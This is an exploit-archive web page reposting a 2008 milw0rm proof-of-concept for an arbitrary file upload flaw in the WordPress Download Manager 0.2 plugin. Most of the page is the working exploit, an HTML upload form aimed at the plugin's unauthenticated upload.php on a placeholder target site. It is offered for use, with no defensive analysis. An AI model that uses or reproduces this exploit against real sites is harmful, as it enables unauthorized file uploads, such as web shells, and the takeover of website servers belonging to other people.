Home Home   Your IP: 54.158.55.251 Forum [Blog]

-: Exploits - Bugs - Vulnerabilities :-


Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD
SaO
BiyoSecurityTeam || www.biyosecurity.com
Plugin URI: http://giulioganci.netsons.org/downloads-manager

<hr color="#f0f8ff">
<fieldset name="upl" class="options">

<form action="http://[site]/wp-content/plugins/
downloads-manager/upload.php?up=http://[site]/wp-content
/plugins/downloads-manager/upload/"
method="post" enctype="multipart/form-data" name="upload">
<table cellspacing="0" cellpadding="3">
<tr>
<td>Local File</td>
</tr>
<tr>
<td>
<input name="upfile" type="file" id="upfile" size="50">
<input type="hidden" name="MAX_FILE_SIZE" value="2048">
</td>
<td><input type="submit" name="up" value="Send" class="button" />
</td>
</tr>
</table>
</form>
</fieldset>

# milw0rm.com [2008-07-24]




































© 2014 Insecure Lab, India                               Affiliates | Contact